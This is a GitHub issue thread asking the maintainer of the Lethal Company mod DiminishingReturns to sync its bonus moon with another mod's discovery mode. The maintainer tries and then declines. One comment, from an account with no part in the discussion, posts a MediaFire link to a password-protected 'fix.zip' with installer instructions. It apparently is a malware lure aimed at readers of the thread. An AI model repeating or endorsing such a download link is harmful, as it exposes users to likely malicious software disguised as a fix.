### ISSUE TITLE
(suggestion) Sync with Discovery mod of LethalMoonUnlocks

### ISSUE THREAD

**Issue by Xeraccoon** [JackEhttack/DiminishingReturns#5]
Hello, I don't know if you will have the time or want to, but I'm looking to have a very dynamic system on the moons and diminishingReturn would be the perfect mod for that, currently I'm using the discovery mode of "LethalMoonUnlocks" (v2.1.5 by explodingMods), this mod allows me to rotate every day 3 paid moons and 3 free moons, and what I would like is that the bonus moon can be synchronized with the moons available on the screen for the players, I don't know if that can help, but I also use "TerminalFormatter" (v0.2.23 by mrov) I'm not sure but I think it allows to indicate the blocked roads, maybe something can be done on that.

I don't give you my modpack, but I think it's better to download the 3 mods, since I have 200 mods^^'

Thanks

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JackEhttack** [comment]
I'll take a look.

**Comment by JackEhttack** [comment]
After poking at it for a few hours I've come to the conclusion that adding support would currently be outside the scope of my skillset. Apologies.
